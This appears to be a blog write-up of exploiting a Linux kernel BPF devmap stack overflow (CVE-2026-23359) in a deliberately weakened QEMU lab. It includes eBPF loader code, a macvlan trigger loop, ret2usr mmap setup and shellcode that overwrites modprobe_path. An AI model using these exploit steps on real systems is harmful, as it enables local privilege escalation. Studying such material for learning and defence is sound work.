⍉ CVE-2026-23359

# recommended listening - irohasasaki - meltdown
aka: They Call Me 007 - 0 Hours Spent Pwning, 0 Hours Spent Thinking, 7 Years Spent Compiling The Linux Kernel; or Valarante Child Game; or Please Bro Just One More Kernel Config Bro Please; or Five Hundred Thousand Dollars at The Next Pwn2Own; or I Know I'm A Chopped Undergrad Okay Leave Me Alone

introduction

A full modprobe_path overwrite. No privileges. No dependencies. Just 455 kb. The consequences? Full local privilege escalation on any Linux device.

Haha nah, just fucking with you. This article was written fully by me, a human. A while ago I'd read a lovely post from my dear friend June about exploiting a CVE in Python. I was a little pissed off reading this post, because I like doing some Python pwn stuff every now and again, and I don't know why the idea of exploiting an actual real-life bug (as compared to a nonsense CTF vulnerability) never occurred to me. I guess I literally just forgot that bugs are real and you can do things with them. I am like a little brainrotted baby who can only think in terms of Challenges and Points and Scoreboards.

To graduate from CTF and enter the big, real world of Being Employable, I decided to try my hand at doing the same thing. I chose not to exploit a Python bug, because (no offense to June) Python bugs are kind of meaningless due to the existence of __import__('os').system('sh'). Like, the shell is already there. We merely choose to arrive at a shell in this roundabout manner because it is fun and educational to understand how these systems work. However, pure educational value isn't what I wanted. No, no, no. I wanted a real Big Boy Bug for real Big Boys (that's me), with real-world implications. I wanted a system that is meaningful to attack, something useful for a change! Not these heap pwn notepad CRUD apps that no one has actually written since 1980. That's right. We're attacking...

The Linux kernel

Ok, first things first, I wasn't going to find a zero-day in the Linux kernel. That's psychotic. I'm not Orange Tsai. My plan was to carefully choose a simple, easy-to-exploit and high-severity CVE in Linux that involved a subsystem I understood well enough. This required a fair bit of thought, and I ended up scrolling a few pages back in Linux's CVE announcement mailing list to find something useful. Eventually, I landed on the target of this post, CVE-2026-23359. The description for it is as follows.


bpf: Fix stack-out-of-bounds write in devmap

get_upper_ifindexes() iterates over all upper devices and writes their
indices into an array without checking bounds.

Also the callers assume that the max number of upper devices is
MAX_NEST_DEV and allocate excluded_devices[1+MAX_NEST_DEV] on the stack,
but that assumption is not correct and the number of upper devices could
be larger than MAX_NEST_DEV (e.g., many macvlans), causing a
stack-out-of-bounds write.

Add a max parameter to get_upper_ifindexes() to avoid the issue.
When there are too many upper devices, return -EOVERFLOW and abort the
redirect.

To reproduce, create more than MAX_NEST_DEV(8) macvlans on a device with
an XDP program attached using BPF_F_BROADCAST | BPF_F_EXCLUDE_INGRESS.
Then send a packet to the device to trigger the XDP redirect path.

The Linux kernel CVE team has assigned CVE-2026-23359 to this issue.
      

I felt very lucky finding this! A stack OOB is like, a baby vulnerability for babies. Additionally, it dealt with a subsystem I was somewhat familiar with, which is eBPF and XDP. Furthermore, it had very clear reproduction details. Awesome! Very cool. I spent some time carefully understanding the anatomy of the bug, and I was relieved to find that it was, indeed, easy breezy.

As I will detail in the following sections, the setup for this bug is decidedly nontrivial, and understanding each part of it even more so. During my own exploitation, because I am a zoomer with no attention span, I simply asked an LLM to generate most of the setup for me such that I could work on the actual relevant kpwn techniques. This was a good decision which probably saved me around a week of effort and boredom; I felt it was wise to ensure that the bug could at least cause a kernel panic before I devoted too much time to a potentially fruitless endeavour.

I bring this up in service of a small point: it is very much possible to understand the exploitation work without fully understanding every detail of every system at play here - this is what I managed to do, initially. I have, however, done my due diligence in ensuring that I properly understood each aspect of the bug, from cause to effect, such that I could accurately document it for my esteemed blog with thousands of fans and readers and RSS subscribers. I only do the best for my adoring readers.

So, this writeup will go into what might be deemed more detail than necessary. Feel free to skip around, I am sure that not all of this is interesting, lmfao (to be honest I think the actual pwn is VERY lame). Anyways let us begin with some light background.

eBPF and XDP

eBPF is, essentially, a subsystem of Linux that allows for users to load and run programs within kernelspace. Instead of having to load a kernel module, a user is simply able to create a program in eBPF and extend certain functionalities of the Linux kernel at runtime. It is honestly a very neat piece of work! There are a lot of things that eBPF programs can be used for, the most interesting one to me being rootkit capabilities (I'm an information security student, after all). eBPF has its own instruction set architecture and functions, all of which are highly interesting - too interesting to actually talk about here.

For our purposes, we are interested in eBPF's capabilities with regards to networking, which is where XDP (eXpress Data Path) comes into play. XDP deals with network packets before the kernel's own networking stack interacts with them. A program that utilises XDP might be used for networking systems that demand a lot of efficiency - for example, DDOS protection or load balancing. The Linux kernel's networking code has a lot of overhead, so XDP allows us to skip past it and deal with packets quicker. We do this by registering an eBPF program and attaching it to a network interface. These network interfaces can be physical interfaces on our machine's NIC, or they can be virtual network devices we can create from userspace.

There are two important details regarding virtual network devices. Firstly, when we create a virtual network device, the kernel assigns it an ifindex from a monotonically increasing global counter. Secondly, some network devices can be 'attached' or placed on top of other network devices. As we will see in the exploit later on, the device we attach the BPF program to will be a veth, and the devices we place on top (which trigger the bug) will be several macvlans.

That is enough background for us to get started.

Studying the bug

I first picked an affected Linux kernel version randomly, 6.19.7. I cloned the repository (which took around 30 minutes, lmfao) and reverted to the change just before the fix. The patch simply adds bounds checks to a function get_upper_ifindexes().

-static int get_upper_ifindexes(struct net_device *dev, int *indexes)
+static int get_upper_ifindexes(struct net_device *dev, int *indexes, int max)
 {
        struct net_device *upper;
        struct list_head *iter;
        int n = 0;

        netdev_for_each_upper_dev_rcu(dev, upper, iter) {
+               if (n >= max)
+                       return -EOVERFLOW;
                indexes[n++] = upper->ifindex;
        }
+
        return n;
 }
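To make the fix concrete, here is a small userspace model of the patched loop. It is only a sketch: the kernel's upper-device list is replaced by a plain array, copy_upper_ifindexes() is a made-up name, and passing MAX_NEST_DEV as max is my assumption about what the patched callers do.

```c
#include <errno.h>

#define MAX_NEST_DEV 8  /* same value the advisory quotes */

/*
 * Userspace stand-in for the patched get_upper_ifindexes().
 * `uppers` plays the role of the device's upper list; the real
 * function walks it with netdev_for_each_upper_dev_rcu().
 */
static int copy_upper_ifindexes(const int *uppers, int n_uppers,
                                int *indexes, int max)
{
    int n = 0;

    for (int i = 0; i < n_uppers; i++) {
        if (n >= max)
            return -EOVERFLOW;  /* the check the patch adds */
        indexes[n++] = uppers[i];
    }
    return n;
}
```

With eight uppers this returns 8 and fills the buffer; with a ninth it bails out with -EOVERFLOW instead of writing past the end, which is exactly the write the unpatched version happily performs.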

get_upper_ifindexes() is called by dev_map_redirect_multi(), which is actually our function of concern here.

    int dev_map_redirect_multi(struct net_device *dev, struct sk_buff *skb,
                               const struct bpf_prog *xdp_prog,
                               struct bpf_map *map, bool exclude_ingress)
    {
            struct bpf_dtab *dtab = container_of(map, struct bpf_dtab, map);
            struct bpf_dtab_netdev *dst, *last_dst = NULL;
            int excluded_devices[1+MAX_NEST_DEV];
            struct hlist_head *head;
            struct hlist_node *next;
            int num_excluded = 0;
            unsigned int i;
            int err;

            if (exclude_ingress) {
                    num_excluded = get_upper_ifindexes(dev, excluded_devices);
                    excluded_devices[num_excluded++] = dev->ifindex;
            }

Essentially, when a packet is received on an interface, any XDP program attached to that interface will fire. If the program calls BPF_REDIRECT_MAP(devmap) (a function which redirects the packets to each device on a devmap), the function above (dev_map_redirect_multi()) is eventually called. dev_map_redirect_multi() allocates a buffer on the stack and stores each 'upper' device's ifindex within that buffer. The vulnerability is that the function assumes there can only be a maximum of 8 upper devices attached to our interface, which is wrong. We can, in fact, make an arbitrary number of devices. This results in our OOB write on the stack.

Let us introduce more detail. Specifically, our exploit path here is to create a target interface (in this case, a veth interface) and attach an XDP program to that interface which calls BPF_REDIRECT_MAP(). We then add many upper devices (in this case, macvlan devices). After sending a packet to that veth interface, the XDP program will fire and the dev_map_redirect_multi() call will iterate through every device stacked on top of our veth interface, hence causing our OOB write on the stack.

There are a lot of different things to set up here. Let's first get started with compiling our vulnerable version of the Linux kernel.

Compilation

As stated above, I'd already cloned the Linux repository to diff the patches against the previously vulnerable version. Due to how great Linux engineers are, compiling the kernel is a very simple task that requires only a handful of commands. We first need to configure the kernel to support the features we want. We'll start with the obvious (networking, BPF, XDP), as well as some baseline requirements like supporting a tty for qemu. We can do this with the wonderful make menuconfig command.

 .config - Linux/x86 6.19.6 Kernel Configuration
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
    Arrow keys navigate the menu.  <Enter> selects submenus ---> (or empty submenus ----).
    Highlighted letters are hotkeys.  Pressing <Y> includes, <N> excludes, <M> modularizes features.
    Press <Esc><Esc> to exit, <?> for Help, </> for Search.  Legend: [*] built-in  [ ] excluded
    <M> module  < > module capable

            General setup  --->
        [ ] 64-bit kernel
            Processor type and features  --->
        [ ] Mitigations for CPU vulnerabilities  ----
            Power management and ACPI options  --->
            Bus options (PCI etc.)  --->
            Binary Emulations  ----
        [ ] Virtualization  ----
            General architecture-dependent options  --->
        [ ] Enable loadable module support  ----
        [ ] Enable the block layer  ----
            Executable file formats  --->
            Memory Management options  --->
        [ ] Networking support  ----
        ↓(+)

            <Select>    < Exit >    < Help >    < Save >    < Load >


This wonderful TUI allows us to configure the Linux kernel easily, starting with a (somewhat) minimal configuration of Linux. After running make -j8 bzImage vmlinux however, I found that it was far too slow on my shitty $400 laptop, with the compilation times taking around 30 minutes. A lot of this is precious power wasted on compiling drivers for shit like AMD chips and temperature sensors. No thanks!

Alternatively, we can see that the CVE announcement itself has its own bzImage and vmlinux QEMU image attached. I did try working with these, but they were just more of a headache - I think these files are meant to be integrated into some sort of syzkaller workflow. They have kASAN enabled by default, which... well, if we're doing exploitation work, we don't want that. So that was also a bust. (I would like to try using these tools at some point...)

Instead, we have to go even more minimal. We can do this by running make tinyconfig, which configures the smallest kernel possible, with only the bare necessities. Then, we can write a script to add all the additional configurations we need on top of that. We will start with the features discussed earlier.

    #!/bin/bash
    cat >>.config <<'EOF'
    CONFIG_BLK_DEV_INITRD=y
    CONFIG_RD_GZIP=y
    CONFIG_TTY=y
    CONFIG_SERIAL_8250=y
    CONFIG_SERIAL_8250_CONSOLE=y
    CONFIG_BLK_DEV=y
    CONFIG_ATA=y
    CONFIG_ATA_PIIX=y
    CONFIG_BLK_DEV_SD=y
    CONFIG_KALLSYMS=y
    CONFIG_KALLSYMS_ALL=y
    CONFIG_NET=y
    CONFIG_UNIX=y
    CONFIG_INET=y
    CONFIG_TUN=y
    CONFIG_PACKET=y
    CONFIG_NETDEVICES=y
    CONFIG_NET_CORE=y
    CONFIG_DUMMY=y
    CONFIG_MACVLAN=y
    CONFIG_VETH=y
    CONFIG_BPF=y
    CONFIG_BPF_FS=y
    CONFIG_BPF_SYSCALL=y
    CONFIG_DEBUG_INFO=y
    CONFIG_DEBUG_INFO_DWARF_TOOLCHAIN_DEFAULT=y
    CONFIG_DEBUG_INFO_BTF=y
    CONFIG_BPF_JIT=y
    CONFIG_GENERIC_XDP=y
    CONFIG_XDP_SOCKETS=y
    EOF

Going through it, this seems like a good list. We have tty support, every networking thing we need for our exploit, and eBPF and XDP support. If we ever need anything, we'll just add it. This really reduces our compile time to something a lot more reasonable.

To run this, I just stole a few files from a kpwn challenge I had on hand. I won't go into the specifics of the setup because there are other great resources for that which I copied, and I do expect the audience of this post to be, like, people who already know what initramfs is.

Anyways, this works nicely. Running this in qemu, we can verify that the setup works...

SeaBIOS (version 1.16.3-debian-1.16.3-2)


iPXE (https://ipxe.org) 00:03.0 CA00 PCI2.10 PnP PMM+1EFC6D30+1EF06D30 CA00

Booting from ROM..
Failed to execute /init (error -8)
Starting init: /bin/sh exists but couldn't execute it (error -8)
Kernel panic - not syncing: No working init found.  Try passing init= option to kernel. See Linux Documentation/admin-guide/init.rst fo.
Kernel Offset: disabled
Rebooting in 1 seconds..

Glup???

So, uh, this is because being able to run ELF files like busybox and shell scripts are kernel configurations that tinyconfig doesn't include. Jeez! They weren't kidding about it being minimal. But, quickly enabling that and recompiling the kernel...

mount: mounting devtmpfs on /dev failed: Resource busy
/bin/sh: can't access tty; job control turned off
/ # ls -alps
total 21372
     0 drwxrwxr-x   12 0        0                0 May 27 21:04 ./
     0 drwxrwxr-x   12 0        0                0 May 27 21:04 ../
     4 -rw-------    1 0        0                9 May 27 21:04 .ash_history
     0 drwxr-xr-x    2 0        0                0 May 27 21:04 bin/
     0 drwxr-xr-x    3 0        0                0 May 27 21:04 dev/
     0 drwxr-xr-x    3 0        0                0 May 20 20:16 etc/
     0 lrwxrwxrwx    1 0        0               11 Dec 11  2020 init -> bin/busybox
  3584 -rw-rw-r--    1 0        0          3670016 May 27 21:04 initramfs.cpio.gz
     0 lrwxrwxrwx    1 0        0               12 May 27 21:04 linuxrc -> /bin/busybox
     0 dr-xr-xr-x   64 0        0                0 May 27 21:04 proc/
     0 drwxr-xr-x    2 0        0                0 Dec 11  2020 root/
     0 drwxr-xr-x    2 0        0                0 May 27 21:04 sbin/
     0 drwxr-xr-x    2 0        0                0 May 27 21:04 tmp/

Ok awesome. Surely, that's not going to happen again, and we can finally move on with the actual interesting exploitation work!

Writing eBPF

First note: wow, doing this is a huge fucking pain! I'm going to handwave over all the agonising here, but rest assured that trying to do something so simple as make a statically compiled program that does what we need is really very terrible! I think you're really not supposed to be able to do this on a minimal system with no libraries from userspace or something - that, or I've missed something embarrassingly obvious. Kubernetes does this! At large scales! What are the Kubernetes people doing that I'm missing? (probably shipping libraries with their images, which I can't do, lmao)

The approach I wanted to take here (which didn't end up panning out) is to use the wonderful libbpf library to import compiled eBPF bytecode. It's very useful, we don't even need to manually create our devmaps if we use it. However, I must have blasphemed God in my last post or something, and He immediately struck me down for daring to want convenience in this manner. After pages and pages of this sort of terminal output:

/usr/bin/ld: (.text+0x600e): undefined reference to `elf_begin'
/usr/bin/ld: (.text+0x602a): undefined reference to `gelf_getehdr'
/usr/bin/ld: (.text+0x6040): undefined reference to `elf_getshdrstrndx'
/usr/bin/ld: (.text+0x6058): undefined reference to `elf_getscn'
/usr/bin/ld: (.text+0x6062): undefined reference to `elf_rawdata'
/usr/bin/ld: (.text+0x60b6): undefined reference to `elf_getdata'
/usr/bin/ld: (.text+0x60cd): undefined reference to `elf_nextscn'

I figured I'd just cut my losses.

Second note: this section is super boring! Like, really! I can't imagine you would care about this part, please feel free to skip it! Serious!

Our eBPF program needs to fulfill three requirements such that the exploit path will trigger (indeed, these are covered in the Linux advisory above).

  1. A devmap needs to be created.
  2. The program needs to call BPF_REDIRECT_MAP.
  3. The program needs to set the BPF_F_BROADCAST | BPF_F_EXCLUDE_INGRESS flags.

We can start with the devmap. There are two ways to create this - with bpftool, or directly, using syscalls from the exploit program itself. After a bit of time trying to wrangle a statically compiled version of bpftool, fighting with version mismatches and whatnot, I gave up and figured the other option was better.

    union bpf_attr map_attr = {
      .map_type    = BPF_MAP_TYPE_DEVMAP,
      .key_size    = 4,
      .value_size  = 4,
      .max_entries = 1
    };
    strncpy(map_attr.map_name, "devmap", BPF_OBJ_NAME_LEN);
    int map_fd = bpf(BPF_MAP_CREATE, &map_attr, sizeof(map_attr));
    printf("[+] devmap fd=%d\n", map_fd);

The file descriptor returned now points to our devmap. Note that bpf() is a helper function defined here:

    static int bpf(int cmd, union bpf_attr *attr, unsigned int size) {
        return syscall(__NR_bpf, cmd, attr, size);
    }

Afterwards, it's time to handwrite some eBPF bytecode I guess. We can make this a bit easier for ourselves by writing the eBPF program in C first (on our host machine, where we have access to wonderful libraries), compiling it, and then putting the bytecode into our exploit program.

    #include <linux/bpf.h>
    #include <bpf/bpf_helpers.h>

    struct {
        __uint(type, BPF_MAP_TYPE_DEVMAP);
        __uint(key_size, 4);
        __uint(value_size, 4);
        __uint(max_entries, 16);
    } devmap SEC(".maps");

    SEC("xdp")
    int xdp_redirect_broadcast(struct xdp_md *ctx)
    {
        return bpf_redirect_map(&devmap, 0, BPF_F_BROADCAST | BPF_F_EXCLUDE_INGRESS);
    }

    char _license[] SEC("license") = "GPL";

We can observe the compiled bytecode using llvm-objdump.

wax@kalmia ~/work/kpwn/poc/initramfs $ llvm-objdump -d xdp_exploit.o

xdp_exploit.o:  file format elf64-bpf

Disassembly of section xdp:

0000000000000000 <xdp_redirect_broadcast>:
       0:       18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 r1 = 0x0 ll
       2:       b7 02 00 00 00 00 00 00 r2 = 0x0
       3:       b7 03 00 00 18 00 00 00 r3 = 0x18
       4:       85 00 00 00 33 00 00 00 call 0x33
       5:       95 00 00 00 00 00 00 00 exit

The compiled object file naturally has ELF headers alongside the important bytecode. We just isolate the bytecode with llvm-objcopy and use my beloved xxd -i to generate a header file that imports the bytestring into our program.

    // byte 1 of the first instruction holds dst_reg/src_reg; 0x11 keeps
    // dst_reg = r1 and sets src_reg = BPF_PSEUDO_MAP_FD
    *(uint32_t *)(xdp_bin + 1) = 0x11; // manual bytepatch #lmfao
    // bytes 4..7 are the immediate, which the kernel now treats as a map fd
    *(uint32_t *)(xdp_bin + 4) = (uint32_t)map_fd;

    union bpf_attr prog_attr = {
       .prog_type = BPF_PROG_TYPE_XDP,
       .insns     = (unsigned long)xdp_bin,
       .insn_cnt  = 6,
       .license   = (unsigned long)"GPL",
       .log_buf   = (unsigned long)log_buf,
       .log_size  = sizeof(log_buf),
       .log_level = 1,
    };

    strncpy(prog_attr.prog_name, "xdp_program", BPF_OBJ_NAME_LEN);
    int prog_fd = bpf(BPF_PROG_LOAD, &prog_attr, sizeof(prog_attr));
    if (prog_fd < 0) {
       fprintf(stderr, "BPF_PROG_LOAD failed: %s\n%s\n", strerror(errno), log_buf);
       return 1;
    }
    printf("[+] prog fd=%d\n", prog_fd);
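If the raw pointer-cast bytepatch above looks too cursed, the same edit can be written against the instruction layout instead. This is a sketch, not what my exploit actually ships: struct insn is a local mirror of the 8-byte struct bpf_insn, PSEUDO_MAP_FD is a local copy of the value of BPF_PSEUDO_MAP_FD, patch_map_fd() is a made-up helper, and a little-endian host is assumed.

```c
#include <stdint.h>
#include <string.h>

#define PSEUDO_MAP_FD 1  /* numeric value of BPF_PSEUDO_MAP_FD */

/* Local mirror of the 8-byte struct bpf_insn layout (little-endian host assumed). */
struct insn {
    uint8_t code;   /* opcode; 0x18 is the 64-bit immediate load */
    uint8_t regs;   /* low nibble dst_reg, high nibble src_reg */
    int16_t off;
    int32_t imm;
};

/*
 * Point the leading 64-bit load at a map fd.
 * Returns 0 on success, -1 if instruction 0 is not a 64-bit load.
 */
static int patch_map_fd(uint8_t *prog, int map_fd)
{
    struct insn ld;

    memcpy(&ld, prog, sizeof(ld));
    if (ld.code != 0x18)
        return -1;
    /* keep dst_reg, mark the immediate as a map file descriptor */
    ld.regs = (uint8_t)((ld.regs & 0x0f) | (PSEUDO_MAP_FD << 4));
    ld.imm = map_fd;
    memcpy(prog, &ld, sizeof(ld));
    return 0;
}
```

Calling patch_map_fd(xdp_bin, map_fd) on the dumped bytecode turns the second byte from 0x01 into 0x11 and drops the fd into bytes 4 to 7, which is the same result as the two casts, minus the unaligned store.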

Then, we need to actually attach this XDP program to our interface. Once again, because God hates me, we are unable to use any of the convenient tooling. There are two programs people typically use. The first is ip, which in my initramfs is the builtin busybox version rather than the real iproute2 one, and it doesn't work, for some reason: the command just doesn't get recognized. The second is xdp-loader, which I can't statically compile for the same reasons I can't statically compile my exploit binary. We can just do this with BPF syscalls manually again, through BPF_LINK_CREATE, as described in the documentation for it.

    void attach_xdp(unsigned int ifindex, int prog_fd) {
      union bpf_attr attr = {
        .link_create = {
          .prog_fd     = prog_fd,
          .target_ifindex = ifindex,
          .attach_type = BPF_XDP,
          .flags       = XDP_FLAGS_SKB_MODE,
        }
      };

      int link_fd = bpf(BPF_LINK_CREATE, &attr, sizeof(attr));
      if (link_fd < 0) {
         perror("BPF_LINK_CREATE");
         exit(1);
      }
      printf("[+] link_fd=%d\n", link_fd);
    }
    

Yay! I think for the most part, that's it. When we run our program and send a packet, the XDP flow should get triggered. Let's test it out by attaching a debugger to qemu and breakpointing at dev_map_redirect_multi().

--------------------------------------------------------------------- source: kernel/bpf/devmap.c+728 ----
    723                            const struct bpf_prog *xdp_prog,
    724                            struct bpf_map *map, bool exclude_ingress)
*   725   {
    726         struct bpf_dtab *dtab = container_of(map, struct bpf_dtab, map);
    727         struct bpf_dtab_netdev *dst, *last_dst = NULL;
           // excluded_devices = 0xffffc90000003c2c  ->  0x0000000effff8880
 -> 728         int excluded_devices[1+MAX_NEST_DEV];
    729         struct hlist_head *head;
    730         struct hlist_node *next;
    731         int num_excluded = 0;
    732         unsigned int i;
    733         int err;
--------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:1] stopped at 0xffffffff812d46c9 <dev_map_redirect_multi+0x19>, reason: SINGLE STEP
----------------------------------------------------------------------------------------------- trace ----
[*#0] 0xffffffff812d46c9 <dev_map_redirect_multi+0x19>
[ #1] 0xffffffff8144b47d <xdp_do_generic_redirect+0x10d> (frame name: xdp_do_generic_redirect_map)
[ #2] 0xffffffff8142760a <do_xdp_generic+0x1aa>
[ #3] 0xffffffff81427793 <__netif_receive_skb_core.constprop.0+0x133> (frame name: __netif_receive_skb_co)

Wow! That was all the tedious, boring shit done. Now, we can finally pwn! I sure hope this pwn goes into some super interesting primitives and ideas and isn't just a straightforward ret2usr! It would be a shame if that was all this ended up being, after all the work we took to get here!

Haha yeah it really is that lame

Remember that our trigger for the bug is adding a bunch of macvlans. We can rewrite the exploit to just run that in a loop about 0x10 or so times.

    void create_macvlan() {
      char cmd[128];
      snprintf(cmd, sizeof(cmd), "ip link add macvlan%d link faceoffs type macvlan mode bridge", gmc);
      system(cmd);
      snprintf(cmd, sizeof(cmd), "ip link set macvlan%d up", gmc);
      gmc++;
      system(cmd);
    }

Stepping through the loop in the debugger where the stack buffer gets populated, we can compare and contrast how the return address + stack cookie gets whacked.

gef> x/16g $rsp - 0x8
0xffffc90000003c10:     0xffffffffc0000056      0xffff888000da7800
0xffffc90000003c20:     0xffffc90000005000      0x2014958
0xffffc90000003c30:     0x0     0x0
0xffffc90000003c40:     0x0     0x0
0xffffc90000003c50:     0xffffc90000003d98      0xffffc90000005000
0xffffc90000003c60:     0x0     0xffffc90000003c88
0xffffc90000003c70:     0xe     0xffff888000da7800
0xffffc90000003c80:     0xffffffff8142760a      0xffff888002014902
gef> 

The return address is at 0xc80, so we should expect to see the stack cookie either before it, or before some other stored registers on the stack. So, uh... where is it? It should be a clearly randomised, null-terminated string. Erm....

Turns out, stack cookie support is another kernel configuration. Glup! It's CONFIG_STACKPROTECTOR=y, which is not included in make tinyconfig. Oops! However, since this exploit turns out to be a direct buffer overflow, we have no way of exploiting the program anyway if stack cookies are enabled. We view this as one of God's limited blessings and press on.

You ever think like, Americans probably call it a stack burger or something? Mm, burger... Imagine a burger... that'd be awesome...

After stepping through the code a little bit - specifically, zooming past the if (exclude_ingress) check, we can view our stack again and see that the values have been clobbered.

    0xffffffff812d4715 0f83c9000000          <dev_map_redirect_multi+0x65>   jae    0xffffffff812d47e4 <dev_map>
--------------------------------------------------------------------------- source: kernel/bpf/devmap.c+740 ----
    735         if (exclude_ingress) {
    736                 num_excluded = get_upper_ifindexes(dev, excluded_devices);
    737                 excluded_devices[num_excluded++] = dev->ifindex;
    738         }
    739   
 -> 740         if (map->map_type == BPF_MAP_TYPE_DEVMAP) {
    741                 for (i = 0; i < map->max_entries; i++) {
    742                         dst = rcu_dereference_check(dtab->netdev_map[i],
    743                                                     rcu_read_lock_bh_held());
    744                         if (!dst)
    745                                 continue;
--------------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:1] stopped at 0xffffffff812d4706 <dev_map_redirect_multi+0x56>, reason: SINGLE STEP
----------------------------------------------------------------------------------------------------- trace ----
[*#0] 0xffffffff812d4706 <dev_map_redirect_multi+0x56>
[ #1] 0x000000050000001b <NO_SYMBOL>
[ #2] 0xffff888002014902 <NO_SYMBOL>
[ #3] 0xffff888002014958 <NO_SYMBOL>
[ #4] 0xffff888002014902 <NO_SYMBOL>
[ #5] 0xffff888002014800 <NO_SYMBOL>
[ #6] 0xffff888000bfd6c0 <NO_SYMBOL>
[ #7] 0x0000000000000000 <NO_SYMBOL>
----------------------------------------------------------------------------------------------------------------
gef> x/16g $rsp - 0x8
0xffffc90000003c10:     0xffffffff812d46f5      0xffff888000da7800
0xffffc90000003c20:     0xffffc90000005000      0x602014958
0xffffc90000003c30:     0x800000007     0xa00000009
0xffffc90000003c40:     0xc0000000b     0xe0000000d
0xffffc90000003c50:     0x100000000f    0x1200000011
0xffffc90000003c60:     0x1400000013    0x1600000015
0xffffc90000003c70:     0x1800000017    0x1a00000019
0xffffc90000003c80:     0x50000001b     0xffff888002014902
gef> 

The buffer stores all these ifindex values, which are ints (32-bit). We can see once again at 0xc80 that our 64-bit return address gets written in two halves - the high 32 bits are overwritten with 0x5, and the low 32 bits are overwritten with 0x1b. Therefore, our arbitrary write to the stack is not exactly arbitrary - it is reliant on the macvlans' ifindex values. I am quite certain that these are assigned via auto-increment, and it is impossible to alter an ifindex directly. The only way to set a device's ifindex to, say, 0x1000, is to create 0x1000 devices.

Clearly, it is implausible to write any useful, high value over the return address this way. (Note that we wouldn't have a KASLR leak in the first place to know what to overwrite it with anyway). So, what can we do with this primitive?

Cheating

We just disable SMAP and SMEP and mmap a page at whatever address we're actually able to overwrite the return address with. In this case, we're able to overwrite to 0x500000000 (well, 0x50000001b), so... just...

    void initialise_ret2usr_mmap() {
      puts("[!] initialising...");
      // map the userspace page that the clobbered return address points into
      chain = mmap((void*)MMAPPED_PAGE, 0x2000,
                   PROT_READ|PROT_WRITE|PROT_EXEC,
                   MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,
                   -1, 0);
      if (chain == MAP_FAILED) {
        perror("mmap");
        exit(1);
      }
      memcpy(chain, (void*)&trampoline, 0x1000);
      chain[0x0] = (unsigned long)&exit_safely;
      puts("[!] wrote trampoline");
    }

I'm really good at this kernel pwn stuff. Yeah so I really don't know if this is exploitable with full protections (I really believe it is not, I couldn't do it, but also I'm dogshit). SMEP and SMAP are basically always enabled on Linux machines, as far as I'm aware? So, rapidly, the usefulness of this exploit is greatly dwindling, and the Zero Day Initiative are going to point and laugh at me and call me a chopped loser... (Note that this exploit was already useless once we had to disable stack cookies).

Wrapping up (actual privesc)

Anyways now we can just dump whatever shellcode we want in our mmap'd page and it will get executed in kernel mode. Hooray! At this point you can either call commit_creds or do modprobe_path overwrite. I think modprobe_path is easily the most aura, so we will do that. I wrote this part in asm because I'm chopped. We need a kASLR leak first, and specifically, one that's within the .text section. When inspecting the registers in a debugger, all the kernelspace addresses were in the stack, which I didn't like. So, instead, I chose to dereference a return address in a later stack frame through rsp. I think this is a simple enough idea and doesn't deserve much belaboring...

    0x500000053 90                    <NO_SYMBOL>   nop
    0x500000054 48c7c74e8f6900        <NO_SYMBOL>   mov    rdi, 0x698f4e
 -> 0x50000005b 4c8b942470010000      <NO_SYMBOL>   mov    r10, QWORD PTR [rsp + 0x170]
    0x500000063 4901fa                <NO_SYMBOL>   add    r10, rdi
    0x500000066 48bf2f746d702f610000  <NO_SYMBOL>   movabs rdi, 0x612f706d742f
    0x500000070 49893a                <NO_SYMBOL>   mov    QWORD PTR [r10], rdi
    0x500000073 0f01f8                <NO_SYMBOL>   swapgs
    0x500000076 48a1707b4b0000000000  <NO_SYMBOL>   movabs rax, ds:0x4b7b70
------------------------------------------------------------------------------------------------------------ memory access: $rsp+0x170 = 0xffffc90000003df8 ----
      0xffffc90000003df8|+0x0000|+000: 0xffffffff81415472 <skb_release_data+0xb2>  ->  0x5c415d5b7f766380
      0xffffc90000003e00|+0x0008|+001: 0xffffffff813218b6 <slab_free.isra+0x16>  ->  0x3950578b3174c084
      0xffffc90000003e08|+0x0010|+002: 0xffff888002009700  ->  0x0000000000000000
      0xffffc90000003e10|+0x0018|+003: 0xffff888000cdd000  ->  0x00000001010a81a0
--------------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:1] stopped at 0x000000050000005b <NO_SYMBOL>, reason: SINGLE STEP
----------------------------------------------------------------------------------------------------- trace ----
[*#0] 0x000000050000005b <NO_SYMBOL>
[ #1] 0xffff888002010102 <NO_SYMBOL>
[ #2] 0xffff88800201015c <NO_SYMBOL>
[ #3] 0xffff888002010102 <NO_SYMBOL>
[ #4] 0xffff888002010000 <NO_SYMBOL>
[ #5] 0xffff888000c0b6c0 <NO_SYMBOL>

At [rsp + 0x170] there's a kernel .text address, so we can just add the offset to modprobe_path. Let's find where that is by reading /proc/kallsyms. (Sidenote: there's not always a .text address here - we are scanning a different stack frame, after all. I think real software engineers call this 'undefined behavior'.)

/ # cat /proc/kallsyms
cat: can't open '/proc/kallsyms': No such file or directory
/ # ls /proc

Glup????????

So, not only is procfs a separate config (CONFIG_PROC_FS), so is /proc/kallsyms (CONFIG_KALLSYMS). Oops... This is really annoying, but I think this will be the last time this happens, right? Whatever...

/ # cat /proc/kallsyms | grep dev_map_redirect_multi
ffffffff812cea50 T dev_map_redirect_multi
/ # cat /proc/kallsyms | grep modprobe
/ # 

Ok, ok, fine. Modules and modprobe_path sit behind yet another config, CONFIG_MODULES. To be honest that one's fine, that one's my bad, seriously. Good thing the exploit still works, though. It would be a huge embarrassment if I missed out on some configuration that would completely brick the exploit... Fixing that up, we can finally obtain our offsets and run the exploit properly.
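
For the record, the offset business is just one subtraction and one addition. Here's a minimal sketch of it, with helper names that are purely illustrative. It assumes the leaked return address and modprobe_path move together under KASLR, which holds when the whole kernel image is slid as one unit.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: compute the constant distance once, from a boot
 * where both addresses are known (e.g. from kallsyms and a debugger). */
static uint64_t offset_from_leak(uint64_t modprobe_path_addr, uint64_t leaked_ret)
{
    assert(modprobe_path_addr >= leaked_ret);
    return modprobe_path_addr - leaked_ret;
}

/* Hypothetical helper: at run time, leak + offset lands on the target,
 * whatever the slide happens to be. */
static uint64_t resolve_target(uint64_t leaked_ret, uint64_t offset)
{
    return leaked_ret + offset;
}
```

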